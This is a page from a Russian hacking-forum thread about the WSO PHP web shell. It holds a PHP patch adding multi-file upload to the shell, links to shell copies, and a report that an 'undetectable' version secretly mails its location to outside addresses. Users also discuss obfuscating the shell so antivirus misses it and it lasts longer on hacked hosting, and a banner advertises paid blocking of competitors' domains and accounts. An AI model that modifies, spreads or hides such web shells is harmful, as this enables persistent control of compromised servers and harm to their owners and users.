WSO (веб-шелл)

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > ИНФО > Статьи > Избранное
WSO (веб-шелл)

Страница 44 из 58

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#431

23.04.2015, 16:25

xavior

Новичок

Регистрация: 03.04.2011

Сообщений: 1

С нами: 7952726

Репутация: 1

Делаем мультиаплоад в шелле. Выложил на Rdot, дублирую также сюда:

Правим input аплоада

Код HTML:

Upload file:$is_writable
>'>

Далее строка примерно 522

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]case[/COLOR][COLOR="#DD0000"]'uploadFile'[/COLOR][COLOR="#007700"]:
...
.....
break;[/COLOR][/COLOR]

Заменяем там блок на

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]case[/COLOR][COLOR="#DD0000"]'uploadFile'[/COLOR][COLOR="#007700"]:
        if ([/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]]) ) {
                foreach ([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]] as[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$tmpName[/COLOR][COLOR="#007700"]) {
                        if(!@[/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmpName[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]])) {
                                echo[/COLOR][COLOR="#DD0000"]"Can't upload file!"[/COLOR][COLOR="#007700"];
                        }
                }
        }
        break;[/COLOR][/COLOR]

#432

10.05.2015, 23:47

Maser_Montan

Новичок

Регистрация: 11.03.2013

Сообщений: 10

С нами: 6933206

Репутация: 0

Некий WSO 2.6 кому сильно надо.

http://pastebin.com/Xneg3zJu

#433

11.05.2015, 06:27

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от Maser_Montan

↑
Некий WSO 2.6 кому сильно надо.
http://pastebin.com/Xneg3zJu

написали бы в чем отличия

#434

21.05.2015, 21:38

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

С нами: 9100556

Репутация: 912

в присутствии бэкдора, пологаю

#435

09.07.2015, 20:43

6agupa

Новичок

Регистрация: 08.05.2015

Сообщений: 27

С нами: 5798486

Репутация: 0

https://code.google.com/p/wso-web-shell-2-8/

Уже на Google Code есть. Версия 2.8. Странно, что он ещё в Metasploit не включён.

А на счёт выкладывания его на GitHub или Google Code, мне кажется, идея здравая. Всё-равно это сто лет как паблик. А пилить вместе всегда веселее.

Или это противоречит политике GitHub?

#436

09.07.2015, 22:07

H@rd

Новичок

Регистрация: 18.05.2015

Сообщений: 27

С нами: 5784086

Репутация: 1

Цитата:

Сообщение от 6agupa

↑
https://code.google.com/p/wso-web-shell-2-8/
Уже на Google Code есть. Версия 2.8. Странно, что он ещё в Metasploit не включён.
А на счёт выкладывания его на GitHub или Google Code, мне кажется, идея здравая. Всё-равно это сто лет как паблик. А пилить вместе всегда веселее.
Или это противоречит политике GitHub?

Запустил WSO2.8_undetectable.php на локалхосте с SMTP-заглушкой.

Скриптом отправляется 2 письма на следующие адреса:

fwrite@live.ca, f3d0s3rv3r@hotmail.com

.SpoilerTarget" type="button">Spoiler: Письмо 1
X-Sendmail-Cmdline: sendmail.pl -t -i

To: fwrite@live.ca

Subject: array localhost/WSO2.8_undetectable.php

X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code

localhost/WSO2.8_undetectable.php

.SpoilerTarget" type="button">Spoiler: Письмо 2
X-Sendmail-Cmdline: sendmail.pl -t -i

To: f3d0s3rv3r@hotmail.com

Subject: WebShell http://localhost/WSO2.8_undetectable.php by 127.0.0.1

X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code(276) : eval()'d code(1) : eval()'d code

Bug: localhost/WSO2.8_undetectable.php by 127.0.0.1

#437

13.07.2015, 12:00

6agupa

Новичок

Регистрация: 08.05.2015

Сообщений: 27

С нами: 5798486

Репутация: 0

Кто-нибудь вообще криптует/минифицирует/обфусцирует WSO2?

Есть в этом смысл вообще? Или современные антивирусы имеют интерпретатор PHP?

#438

13.07.2015, 14:42

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

С нами: 10095779

Репутация: 137

Смысл имеет! У меня к примеру сейчас, есть вариант который не один ав не палит, что позволяет дольше быть незамеченным на хостинге. ручками все делал, хочу свой оббусификатор написать но ручки пока не доходят, вариант на 50% сырой еще.

#439

19.07.2015, 20:18

Expl0ited

Познавший АНТИЧАТ

Регистрация: 16.07.2010

Сообщений: 1,022

С нами: 8328566

Репутация: 935

Цитата:

Сообщение от I_I

↑
https://github.com/HARDLINUX/webshell
Новый WebShell 2015 года, если кто шарит помогайте улучшать

И что же ты изменил? Испортил дизайн и добавил бесполезную ***ню?

#440

19.07.2015, 20:23

3ran

Познающий

Регистрация: 27.07.2012

Сообщений: 39

С нами: 7260086

Репутация: 5

Цитата:

Сообщение от I_I

↑
https://github.com/HARDLINUX/webshell
Новый WebShell 2015 года, если кто шарит помогайте улучшать

Сделай описание что нового ты добавил в эту версию.

Страница 44 из 58

« Первая

Последняя »

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Веб 2.0 и Веб 3.0. Будущее Интернета.	SK \| Heaton	Мировые новости. Обсуждения.	5	13.06.2007 02:07
Переделанный шелл!	k1b0rg	PHP	33	03.04.2007 08:29

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход